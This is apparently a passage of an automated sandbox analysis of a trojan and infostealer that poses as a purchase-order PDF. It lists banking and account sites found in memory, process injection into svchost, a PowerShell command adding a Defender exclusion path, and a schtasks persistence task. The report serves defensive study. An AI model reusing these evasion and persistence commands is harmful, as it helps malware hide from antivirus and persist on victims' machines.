                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: AppVClient.exe, 00000016.00000003.2182103866.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000002.2185176053.00000000004F0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.2182232459.00000000004EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
                            Source: alg.exe, 00000009.00000003.3298047259.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2587369712.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2641781426.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2605900173.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2464247908.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576145561.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3259678244.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2560073777.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2177000744.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2621710164.000000000056E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^lw
                            Source: build.exe, 00000007.00000002.2550955586.0000000001180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                            Source: SensorDataService.exe, 00000023.00000003.2314646412.0000000000635000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                            Source: Spectrum.exe, 00000025.00000003.2335866500.000000000053D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                            Source: Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: SensorDataService.exe, 00000023.00000003.2418257754.000000000064F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @,eSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                            Source: Spectrum.exe, 00000025.00000003.2335866500.000000000053D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: SensorDataService.exe, 00000023.00000003.2418497581.000000000061C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus DeviceV`
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                            Source: Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B46D90 LdrInitializeThunk,7_2_05B46D90
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0553E500 mov eax, dword ptr fs:[00000030h]0_2_0553E500
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0553E4A0 mov eax, dword ptr fs:[00000030h]0_2_0553E4A0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0553CEA0 mov eax, dword ptr fs:[00000030h]0_2_0553CEA0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_057B14E0 mov eax, dword ptr fs:[00000030h]3_2_057B14E0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_057B1480 mov eax, dword ptr fs:[00000030h]3_2_057B1480
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_057AFE80 mov eax, dword ptr fs:[00000030h]3_2_057AFE80
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B13F3D mov eax, dword ptr fs:[00000030h]4_2_04B13F3D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AD1130 mov eax, dword ptr fs:[00000030h]4_2_04AD1130
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0042202E SetUnhandledExceptionFilter,3_2_0042202E
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004230F5
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00417D93
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00421FA7
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004015D7 SetUnhandledExceptionFilter,4_2_004015D7
                            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04B14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_04B14C7B
                            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04B11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_04B11361
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Memory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtOpenKeyEx: Indirect: 0x140077B9B
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtQueryValueKey: Indirect: 0x140077C9F
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtClose: Indirect: 0x140077E81
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2814008
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0043916A LogonUserW, 0_2_0043916A
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D6D0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004375B0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_00436431
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                            Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe"
                            Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD5D5.tmp.cmd""
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00445DD3
                            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04AF8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,FreeSid,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW, 4_2_04AF8550
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Binary or memory string: Shell_TrayWnd
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000000.2047969124.0000000000482000.00000002.00000001.01000000.00000003.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00410D10 cpuid 0_2_00410D10
                            Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\alg.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
